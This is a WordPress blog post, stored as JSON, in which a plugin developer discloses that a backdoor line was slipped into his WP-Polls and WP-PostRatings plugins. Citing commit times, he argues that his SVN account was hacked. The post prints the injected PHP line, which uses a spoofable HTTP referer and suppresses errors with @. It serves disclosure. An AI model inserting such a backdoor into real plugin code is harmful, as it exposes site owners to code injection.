{"id":302,"date":"2011-02-17T19:10:06","date_gmt":"2011-02-17T11:10:06","guid":{"rendered":"http:\/\/lesterchan.net\/wordpress\/?p=302"},"modified":"2011-02-17T19:22:36","modified_gmt":"2011-02-17T11:22:36","slug":"code-injection-follow-up","status":"publish","type":"post","link":"https:\/\/lesterchan.net\/wordpress\/2011\/02\/17\/code-injection-follow-up\/","title":{"rendered":"Code Injection Follow Up"},"content":{"rendered":"<p>I have release 2 security updates to <a href=\"https:\/\/lesterchan.net\/wordpress\/2011\/02\/14\/wp-polls-2-61\/\">WP-Polls<\/a> and<a href=\"https:\/\/lesterchan.net\/wordpress\/2011\/02\/17\/wp-postratings-1-61\/\"> WP-PostRatings<\/a> which basically removes a malicious code that allows code injection.<\/p>\n<p>The malicious code is as follows:<br \/>\n<code><br \/>\nif ($_SERVER['PHP_SELF'] == @links_add_base_url(\"\/\", $_SERVER['HTTP_REFERER']))<br \/>\n  return;<br \/>\n<\/code><\/p>\n<p>The code itself does nothing, but hackers are spoofing the <code>$_SERVER['HTTP_REFERER']<\/code> that allows arbitrary code injection and note the @ sign which surpress all errors and hence the error will not be displayed.<\/p>\n<p>I am 100% sure based on the points below that the code was not added by me. I am beginning to believe that my account was hacked.<\/p>\n<ul>\n<li>Personally, I have no idea what <code>links_add_base_url()<\/code> does and hence it is impossible for me to place it in my own plugin code.<\/li>\n<li>I checked the commit date for the <a href=\"http:\/\/plugins.trac.wordpress.org\/changeset\/307914\">changeset of WP-PostRatings<\/a> and the date\/time is <strong>11\/04\/10 22:10:13<\/strong>. Since I am on the GMT+8 zone, it is 6am for me. I do not wake up at 6am just to update my plugin.<\/li>\n<li>The above changeset is for trunk. However in my readme.txt,  I have state that the stable tag is 1.50 and hence the file is copied to \/tags\/1.50\/ in <a href=\"http:\/\/plugins.trac.wordpress.org\/changeset\/307952\">this changeset<\/a>, but if you note the time, it is <strong>11\/05\/10 00:52:39<\/strong>. This is almost 3 hours after the trunk commit and it is almost 9am on my timezone and I will be in my office and my office&#8217;s computer does not have SVN copies of my plugin. So it is also not possible for me to commit that file<\/li>\n<li>If you notice the same changeset, the file is being copied from trunk to tags\/1.50 by SVN copy. I do not do a SVN copy for my plugins, normally I will just copy and paste the files using my Windows Explorer.<\/li>\n<li>For WP-Polls, there is only <a href=\"http:\/\/plugins.trac.wordpress.org\/changeset\/308113\">1 changeset<\/a> as my stable tag is from trunk and the timestamp is <strong>11\/05\/10 12:30:07<\/strong>. This is about 12 hours after the changeset of WP-PostRatings. On my timezone it is about 8.30pm and it is not possible for me to check-in because 8pm to 9pm is my dinner time and I always eat out.<\/li>\n<li>For WP-WAP, there is almost 2 suspicious commit, <a href=\"http:\/\/plugins.trac.wordpress.org\/changeset\/307055\">here<\/a> and <a href=\"http:\/\/plugins.trac.wordpress.org\/changeset\/307063\">here<\/a>. As I do not develop WP-Wap anymore, there is no reason for me to commit something to it<\/li>\n<\/ul>\n<p>I am going to review all my commits to the SVN to ensure that there are no more suspicious code being added.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>I have release 2 security updates to WP-Polls and WP-PostRatings which basically removes a malicious code that allows code injection. The malicious code is as follows: if ($_SERVER[&#8216;PHP_SELF&#8217;] == @links_add_base_url(&#8220;\/&#8221;, $_SERVER[&#8216;HTTP_REFERER&#8217;])) return; The code itself does nothing, but hackers are spoofing the $_SERVER[&#8216;HTTP_REFERER&#8217;] that allows arbitrary code injection and note the @ sign which surpress &hellip; <a href=\"https:\/\/lesterchan.net\/wordpress\/2011\/02\/17\/code-injection-follow-up\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;Code Injection Follow Up&#8221;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[128,127],"class_list":["post-302","post","type-post","status-publish","format-standard","hentry","category-wordpress","tag-vulnerability","tag-xss"],"views":12980,"_links":{"self":[{"href":"https:\/\/lesterchan.net\/wordpress\/wp-json\/wp\/v2\/posts\/302","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lesterchan.net\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lesterchan.net\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lesterchan.net\/wordpress\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lesterchan.net\/wordpress\/wp-json\/wp\/v2\/comments?post=302"}],"version-history":[{"count":0,"href":"https:\/\/lesterchan.net\/wordpress\/wp-json\/wp\/v2\/posts\/302\/revisions"}],"wp:attachment":[{"href":"https:\/\/lesterchan.net\/wordpress\/wp-json\/wp\/v2\/media?parent=302"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lesterchan.net\/wordpress\/wp-json\/wp\/v2\/categories?post=302"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lesterchan.net\/wordpress\/wp-json\/wp\/v2\/tags?post=302"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}